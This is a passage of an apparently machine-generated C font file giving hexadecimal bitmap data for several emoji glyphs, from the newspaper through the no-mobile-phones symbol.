0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7c, 0xcd,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x6, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0x80, 0x0, 0x78, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0xf, 0xe0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x1, 0xfc, 0x0, 0x0, 0xf, 0xe0, 0x0, 0x0,
0x0, 0x1f, 0xc0, 0x0, 0x0, 0xfc, 0x0, 0x0,
0x0, 0x1, 0xf8, 0x0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x1, 0x0,
0x0, 0x0, 0x0, 0x2, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0,
/* U+1F4F0 "📰" */
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x83, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x1f, 0x0, 0x0, 0x0, 0xc, 0x0,
0x0, 0x0, 0xe3, 0xe0, 0x0, 0x0, 0xf, 0xe0,
0x0, 0x0, 0x1c, 0x7c, 0x1f, 0xff, 0xe3, 0xfe,
0x3f, 0xff, 0xc3, 0x8f, 0x83, 0xff, 0xfc, 0x7f,
0xe7, 0xff, 0xf8, 0x71, 0xf0, 0x7f, 0xff, 0x8f,
0xfc, 0xff, 0xff, 0xe, 0x3e, 0xf, 0xff, 0xf3,
0xff, 0x9f, 0xff, 0xe1, 0xc7, 0xc1, 0xff, 0xfe,
0x3f, 0xf3, 0xff, 0xfc, 0x38, 0xf8, 0x3f, 0xff,
0xc7, 0xfe, 0x7f, 0xff, 0x87, 0x1f, 0x7, 0xff,
0xf8, 0xff, 0x8f, 0xff, 0xf0, 0xe3, 0xe0, 0xff,
0xff, 0xf, 0xe1, 0xff, 0xfe, 0x1c, 0x7c, 0x0,
0x0, 0x0, 0x30, 0x0, 0x0, 0x3, 0x8f, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x71, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x3e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc7,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x1f, 0x7, 0xff, 0x81, 0xff, 0xc0, 0xff, 0xf0,
0xe3, 0xe0, 0xff, 0xf0, 0x3f, 0xf8, 0x1f, 0xfe,
0x1c, 0x7c, 0x1f, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x3, 0x8f, 0x83, 0xff, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x71, 0xf0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
0x0, 0xe, 0x3e, 0xf, 0xff, 0x3, 0xff, 0x81,
0xff, 0xe1, 0xc7, 0xc1, 0xff, 0xe0, 0x7f, 0xf0,
0x3f, 0xfc, 0x38, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x1f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe3, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x7c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x8f, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x71, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x3e, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xe1, 0xc7, 0xc1, 0xff,
0xff, 0xff, 0xf0, 0x3f, 0xfc, 0x38, 0xf8, 0x3f,
0xff, 0xff, 0xfe, 0x0, 0x0, 0x7, 0x1f, 0x7,
0xff, 0xff, 0xff, 0xc0, 0x0, 0x0, 0xe3, 0xe0,
0xff, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x1c, 0x7c,
0x1f, 0xff, 0xff, 0xff, 0x3, 0xff, 0xc3, 0x8f,
0x83, 0xff, 0xff, 0xff, 0xe0, 0x7f, 0xf8, 0x71,
0xf0, 0x7f, 0xff, 0xff, 0xfc, 0x0, 0x0, 0xe,
0x3e, 0xf, 0xff, 0xff, 0xff, 0x80, 0x0, 0x1,
0xc7, 0xc1, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x0,
0x38, 0xf8, 0x3f, 0xff, 0xff, 0xfe, 0x7, 0xff,
0x87, 0x1f, 0x7, 0xff, 0xff, 0xff, 0xc0, 0xff,
0xf0, 0xe3, 0xe0, 0xff, 0xff, 0xff, 0xf8, 0x0,
0x0, 0x1c, 0x7c, 0x1f, 0xff, 0xff, 0xff, 0x0,
0x0, 0x3, 0x8f, 0x83, 0xff, 0xff, 0xff, 0xe0,
0x0, 0x0, 0x7b, 0xb8, 0x7f, 0xff, 0xff, 0xfc,
0x0, 0x0, 0x7, 0x77, 0xf, 0xff, 0xff, 0xff,
0x80, 0x0, 0x0, 0xfc, 0x70, 0xff, 0xff, 0xff,
0xf0, 0x0, 0x0, 0xf, 0x8f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc,
/* U+1F4F1 "📱" */
0xf, 0xff, 0xff, 0xff, 0xe0, 0x7f, 0xff, 0xff,
0xff, 0xf1, 0xff, 0xe0, 0x0, 0xff, 0xf7, 0xff,
0xc0, 0x1, 0xff, 0xff, 0xff, 0x80, 0x3, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x1f, 0xf0,
0x0, 0x0, 0x0, 0x1f, 0xc0, 0x0, 0x0, 0x0,
0x1f, 0x80, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0,
0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0, 0xfc,
0x1e, 0x78, 0xf3, 0xc1, 0xf8, 0x3c, 0xf1, 0xe7,
0x83, 0xf0, 0x79, 0xe3, 0xcf, 0x7, 0xe0, 0xf3,
0xc7, 0x9e, 0xf, 0xc0, 0x0, 0x0, 0x0, 0x1f,
0x80, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x7e, 0xf, 0x3c, 0x79, 0xe0, 0xfc, 0x1e,
0x78, 0xf3, 0xc1, 0xf8, 0x3c, 0xf1, 0xe7, 0x83,
0xf0, 0x79, 0xe3, 0xcf, 0x7, 0xe0, 0x0, 0x0,
0x0, 0xf, 0xc0, 0x0, 0x0, 0x0, 0x1f, 0x83,
0xcf, 0x1e, 0x78, 0x3f, 0x7, 0x9e, 0x3c, 0xf0,
0x7e, 0xf, 0x3c, 0x79, 0xe0, 0xfc, 0x1e, 0x78,
0xf3, 0xc1, 0xf8, 0x0, 0x0, 0x0, 0x3, 0xf0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0xf3, 0xc0, 0x0,
0xf, 0xc1, 0xe7, 0x80, 0x0, 0x1f, 0x83, 0xcf,
0x0, 0x0, 0x3f, 0x7, 0x9e, 0x0, 0x0, 0x7e,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x1, 0xf8, 0x0, 0x0, 0x0, 0x3, 0xf0, 0x0,
0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0xf,
0xc0, 0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0,
0x0, 0x3f, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x1,
0xf8, 0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0xf, 0xc0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x3f, 0x0, 0x0, 0x0, 0x0, 0x7e, 0xf, 0x3c,
0x79, 0xe0, 0xfc, 0x1e, 0x78, 0xf3, 0xc1, 0xf8,
0x3c, 0xf1, 0xe7, 0x83, 0xf0, 0x79, 0xe3, 0xcf,
0x7, 0xe0, 0x0, 0x0, 0x0, 0xf, 0xc0, 0x0,
0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x3f,
0x0, 0x0, 0x0, 0x0, 0x7f, 0x0, 0x0, 0x0,
0x1, 0xef, 0x0, 0x0, 0x0, 0x7, 0x8f, 0xff,
0xff, 0xff, 0xfe, 0xf, 0xff, 0xff, 0xff, 0xf8,
/* U+1F4F2 "📲" */
0x0, 0x0, 0x0, 0x7, 0xff, 0xff, 0xff, 0xf0,
0x0, 0x0, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xfc,
0x0, 0x0, 0x0, 0x3f, 0xfc, 0x0, 0x1f, 0xfe,
0x0, 0x0, 0x0, 0x7f, 0xfc, 0x0, 0x1f, 0xff,
0x0, 0x0, 0x0, 0x7f, 0xfc, 0x0, 0x1f, 0xff,
0x0, 0x0, 0x0, 0x7f, 0xff, 0xff, 0xff, 0xff,
0x0, 0x0, 0x0, 0x7f, 0xff, 0xff, 0xff, 0xff,
0x0, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x0, 0x1f,
0x0, 0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0xf,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x0, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x0, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x0, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x0, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x40, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x60, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x70, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x7c, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x7e, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0xff, 0xff, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0xff, 0xff, 0x80, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0xff, 0xff, 0xc0, 0x70, 0x0, 0x0, 0x0, 0x7,
0xff, 0xff, 0xe0, 0x70, 0x0, 0x0, 0x0, 0x7,
0xff, 0xff, 0xf0, 0x70, 0x79, 0xe0, 0x0, 0x7,
0xff, 0xff, 0xf0, 0x70, 0x79, 0xe0, 0x0, 0x7,
0xff, 0xff, 0xe0, 0x70, 0x79, 0xe0, 0x0, 0x7,
0xff, 0xff, 0xc0, 0x70, 0x79, 0xe0, 0x0, 0x7,
0xff, 0xff, 0x80, 0x70, 0x79, 0xe0, 0x0, 0x7,
0xff, 0xff, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x7e, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x7c, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x78, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x70, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x60, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x40, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x0, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x0, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x0, 0x0, 0x70, 0x79, 0xe3, 0xcf, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0xf,
0x0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xfc,
0x0, 0x0, 0x0, 0xf, 0xff, 0xff, 0xff, 0xf8,
/* U+1F4F3 "📳" */
0x0, 0x0, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x7, 0xff, 0xff, 0xff, 0xf8, 0x0, 0x0,
0x0, 0x38, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0,
0x70, 0x3, 0xff, 0x0, 0x38, 0x0, 0x0, 0x1,
0xc0, 0xf, 0xfc, 0x0, 0xe0, 0x0, 0x4, 0x7,
0x0, 0x0, 0x0, 0x3, 0x80, 0x80, 0x38, 0x1c,
0x0, 0x0, 0x0, 0xe, 0x6, 0x0, 0xe0, 0x70,
0x0, 0x0, 0x0, 0x38, 0x1c, 0x7, 0x1, 0xc0,
0x0, 0x0, 0x0, 0xe0, 0x38, 0x1c, 0x7, 0x0,
0x0, 0x0, 0x3, 0x80, 0xe0, 0xe0, 0x1c, 0x3f,
0xff, 0xff, 0xe, 0x1, 0xc3, 0x80, 0x70, 0xff,
0xff, 0xfc, 0x38, 0x7, 0x1c, 0x1, 0xc3, 0xff,
0xff, 0xf0, 0xe0, 0xe, 0x60, 0x7, 0xe, 0x3c,
0xf1, 0xc3, 0x80, 0x1f, 0x80, 0x1c, 0x38, 0xf3,
0xc7, 0xe, 0x0, 0x77, 0x0, 0x70, 0xe3, 0xcf,
0x1c, 0x38, 0x3, 0x9c, 0x1, 0xc3, 0xff, 0xff,
0xf0, 0xe0, 0xe, 0x38, 0x7, 0xf, 0xff, 0xff,
0xc3, 0x80, 0x70, 0x60, 0x1c, 0x3f, 0xff, 0xff,
0xe, 0x1, 0xc1, 0xc0, 0x70, 0xff, 0xff, 0xfc,
0x38, 0xe, 0x3, 0x81, 0xc3, 0x8f, 0x3c, 0x70,
0xe0, 0x70, 0xe, 0x7, 0xe, 0x3c, 0xf1, 0xc3,
0x81, 0xc0, 0x38, 0x1c, 0x38, 0xf3, 0xc7, 0xe,
0x7, 0x1, 0xc0, 0x70, 0xff, 0xff, 0xfc, 0x38,
0xe, 0x7, 0x1, 0xc3, 0xff, 0xff, 0xf0, 0xe0,
0x38, 0x38, 0x7, 0xf, 0xff, 0xff, 0xc3, 0x80,
0x71, 0xc0, 0x1c, 0x3f, 0xff, 0xff, 0xe, 0x0,
0xe7, 0x0, 0x70, 0xe3, 0xcf, 0xfc, 0x38, 0x3,
0xb8, 0x1, 0xc3, 0x8f, 0x3f, 0xf0, 0xe0, 0x7,
0xe0, 0x7, 0xe, 0x3c, 0xff, 0xc3, 0x80, 0x1d,
0xc0, 0x1c, 0x3f, 0xff, 0xff, 0xe, 0x0, 0xe3,
0x80, 0x70, 0xff, 0xff, 0xfc, 0x38, 0x7, 0xe,
0x1, 0xc3, 0xff, 0xff, 0xf0, 0xe0, 0x1c, 0x1c,
0x7, 0xf, 0xff, 0xff, 0xc3, 0x80, 0xe0, 0x70,
0x1c, 0x3f, 0xff, 0xff, 0xe, 0x3, 0x80, 0xe0,
0x70, 0xff, 0xff, 0xfc, 0x38, 0x1c, 0x3, 0x81,
0xc3, 0xff, 0xff, 0xf0, 0xe0, 0x70, 0xe, 0x7,
0xf, 0xff, 0xff, 0xc3, 0x81, 0xc0, 0x70, 0x1c,
0x3f, 0xff, 0xff, 0xe, 0x3, 0x81, 0xc0, 0x70,
0xff, 0xff, 0xfc, 0x38, 0xe, 0xe, 0x1, 0xc3,
0xff, 0xff, 0xf0, 0xe0, 0x1c, 0x70, 0x7, 0xf,
0xff, 0xff, 0xc3, 0x80, 0x39, 0xc0, 0x1c, 0x3f,
0xff, 0xff, 0xe, 0x0, 0xee, 0x0, 0x70, 0xff,
0xff, 0xfc, 0x38, 0x1, 0xf8, 0x1, 0xc3, 0xff,
0xff, 0xf0, 0xe0, 0x7, 0x70, 0x7, 0xf, 0xff,
0xff, 0xc3, 0x80, 0x38, 0xc0, 0x1c, 0x3f, 0xff,
0xff, 0xe, 0x0, 0xc3, 0x80, 0x70, 0xff, 0xff,
0xfc, 0x38, 0x7, 0x7, 0x1, 0xc3, 0xff, 0xff,
0xf0, 0xe0, 0x38, 0x1c, 0x7, 0xe, 0x3c, 0xf1,
0xc3, 0x80, 0xe0, 0x38, 0x1c, 0x38, 0xf3, 0xc7,
0xe, 0x7, 0x0, 0xe0, 0x70, 0xe3, 0xcf, 0x1c,
0x38, 0x1c, 0x1, 0x81, 0xc3, 0xff, 0xff, 0xf0,
0xe0, 0x60, 0x0, 0x7, 0xf, 0xff, 0xff, 0xc3,
0x80, 0x0, 0x0, 0x1c, 0x3f, 0xff, 0xff, 0xe,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x38,
0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0xe0,
0x0, 0x0, 0x7, 0x0, 0x0, 0x0, 0x3, 0x80,
0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x1c, 0x0,
0x0, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0x0, 0x0,
/* U+1F4F4 "📴" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x0, 0x0, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x0, 0x0, 0x7, 0xff, 0xff,
0xff, 0xff, 0xfc, 0x0, 0x0, 0x1, 0xff, 0xff,
0xff, 0xff, 0xfc, 0x0, 0x0, 0x0, 0xff, 0xff,
0xff, 0xff, 0xfe, 0x3, 0x1f, 0xc0, 0x7f, 0xff,
0xff, 0xff, 0xff, 0x1, 0x8f, 0xf0, 0x3f, 0xff,
0xff, 0xff, 0xff, 0x80, 0x0, 0x0, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x0, 0x0, 0xf, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x0, 0x0, 0x7, 0xff,
0xff, 0xff, 0xff, 0xf1, 0xff, 0xff, 0xe3, 0xff,
0xff, 0xff, 0xff, 0xf8, 0xff, 0xff, 0xf1, 0xff,
0xff, 0xff, 0xff, 0xfc, 0x7f, 0xff, 0xf8, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x3f, 0xff, 0xfc, 0x7f,
0xff, 0xff, 0xff, 0xff, 0x1f, 0xff, 0xfe, 0x3f,
0xff, 0xff, 0xff, 0xff, 0x8f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc7, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe3, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf1, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0xfe, 0x3, 0xf0,
0xe, 0x3, 0xff, 0xff, 0xfc, 0x7e, 0x0, 0xf8,
0x7, 0x1, 0xff, 0xff, 0xfe, 0x3e, 0x0, 0x3c,
0x3, 0x80, 0xff, 0xff, 0xff, 0x1f, 0xf, 0x1e,
0x3f, 0xcf, 0xff, 0xff, 0xff, 0x8f, 0xf, 0xc7,
0x1f, 0xe7, 0xff, 0xff, 0xff, 0xc7, 0x87, 0xe3,
0x8f, 0xf3, 0xff, 0xff, 0xff, 0xe3, 0xc3, 0xf9,
0xc7, 0xf9, 0xff, 0xff, 0xff, 0xf1, 0xe1, 0xfc,
0xe0, 0x1c, 0x7, 0xff, 0xff, 0xf8, 0xf0, 0xfe,
0x70, 0xe, 0x3, 0xff, 0xff, 0xfc, 0x78, 0x7e,
0x38, 0xff, 0x3f, 0xff, 0xff, 0xfe, 0x3e, 0x3f,
0x3c, 0x7f, 0x9f, 0xff, 0xff, 0xff, 0x1f, 0xf,
0x1e, 0x3f, 0xcf, 0xff, 0xff, 0xff, 0x8f, 0xc0,
0x1f, 0x1f, 0xe7, 0xff, 0xff, 0xff, 0xc7, 0xf8,
0x3f, 0x8f, 0xf3, 0xff, 0xff, 0xff, 0xe3, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x7f,
0xff, 0xf8, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x3f,
0xff, 0xfc, 0x7f, 0xff, 0xff, 0xff, 0xff, 0x1f,
0xff, 0xfe, 0x3f, 0xff, 0xff, 0xff, 0xff, 0x8f,
0xff, 0xff, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xc7,
0xff, 0xff, 0x8f, 0xff, 0xff, 0xff, 0xff, 0xe3,
0xff, 0xff, 0xc7, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x0, 0x0, 0x3, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x0, 0x0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0, 0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x0, 0x0, 0x0, 0x7f, 0xff, 0xff, 0xff, 0xff,
0x0, 0x7f, 0xc0, 0x3f, 0xff, 0xff, 0xff, 0xff,
0x80, 0x0, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x0, 0x0, 0xf, 0xff, 0xff, 0xff, 0xff,
0xf8, 0x0, 0x0, 0xf, 0xff, 0xff, 0xff, 0xff,
0xff, 0x80, 0x0, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfb,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
/* U+1F4F5 "📵" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x3c, 0x0, 0x3f, 0xff, 0x80, 0x7,
0x80, 0x0, 0x3c, 0x1, 0xff, 0xff, 0xfc, 0x1,
0xe0, 0x0, 0x1f, 0x1, 0xff, 0xff, 0xff, 0x0,
0x70, 0x0, 0x1d, 0xc0, 0xff, 0xff, 0xff, 0x80,
0x1c, 0x0, 0x1c, 0x70, 0x7e, 0x70, 0xf, 0xc0,
0x7, 0x0, 0x1e, 0x1c, 0x3f, 0x38, 0x7, 0xe0,
0x3, 0xc0, 0xe, 0x7, 0x1f, 0xff, 0xff, 0xf0,
0x0, 0xe0, 0xe, 0x1, 0xcf, 0xff, 0xff, 0xf8,
0x0, 0x38, 0x7, 0x0, 0x77, 0x0, 0x0, 0x1c,
0x0, 0x1c, 0x7, 0x0, 0x1f, 0x80, 0x0, 0xe,
0x0, 0x7, 0x3, 0x80, 0x7, 0xc0, 0x0, 0x7,
0x0, 0x3, 0x83, 0x80, 0x1, 0xe0, 0x0, 0x3,
0x80, 0x0, 0xe1, 0xc0, 0x0, 0x70, 0x0, 0x1,
0xc0, 0x0, 0x71, 0xc0, 0x0, 0x3c, 0x0, 0x0,
0xe0, 0x0, 0x3c, 0xe0, 0x0, 0x1f, 0x0, 0x0,
0x70, 0x0, 0xe, 0x70, 0x0, 0xf, 0xc0, 0x0,
0x38, 0x0, 0x7, 0x38, 0x0, 0x7, 0x70, 0x0,
0x1c, 0x0, 0x3, 0xb8, 0x0, 0x3, 0x9c, 0x0,
0xe, 0x0, 0x0, 0xfc, 0x0, 0x1, 0xc7, 0x0,
0x7, 0x0, 0x0, 0x7e, 0x0, 0x0, 0xe1, 0xc0,
0x3, 0x80, 0x0, 0x3f, 0x0, 0x0, 0x70, 0x70,
0x1, 0xc0, 0x0, 0x1f, 0x80, 0x0, 0x38, 0x1c,
0x0, 0xe0, 0x0, 0xf, 0xc0, 0x0, 0x1c, 0x7,
0x0, 0x70, 0x0, 0x7, 0xe0, 0x0, 0xe, 0x1,
0xc0, 0x38, 0x0, 0x3, 0xf0, 0x0, 0x7, 0x0,
0x70, 0x1c, 0x0, 0x1, 0xf8, 0x0, 0x3, 0x80,
0x1c, 0xe, 0x0, 0x0, 0xfc, 0x0, 0x1, 0xc0,
0x7, 0x7, 0x0, 0x0, 0x7e, 0x0, 0x0, 0xe0,
0x1, 0xc3, 0x80, 0x0, 0x3f, 0x0, 0x0, 0x70,
0x0, 0x71, 0xc0, 0x0, 0x3d, 0xc0, 0x0, 0x38,
0x0, 0x1c, 0xe0, 0x0, 0x1c, 0xe0, 0x0, 0x1c,
0x0, 0x7, 0x70, 0x0, 0xe, 0x70, 0x0, 0xe,
0x0, 0x1, 0xf8, 0x0, 0x7, 0x3c, 0x0, 0x7,
0x0, 0x0, 0x7c, 0x0, 0x7, 0x8e, 0x0, 0x3,
0x80, 0x0, 0x1e, 0x0, 0x3, 0x87, 0x0, 0x1,
0xc0, 0x0, 0x7, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0xe0, 0x0, 0x3, 0xc0, 0x1, 0xc0, 0xe0, 0x0,
0x70, 0x0, 0x1, 0xf0, 0x0, 0xe0, 0x38, 0x0,
0x38, 0x0, 0x0, 0xfc, 0x0, 0xe0, 0x1c, 0x0,
0x1f, 0xff, 0xff, 0xf7, 0x0, 0x70, 0x7, 0x0,
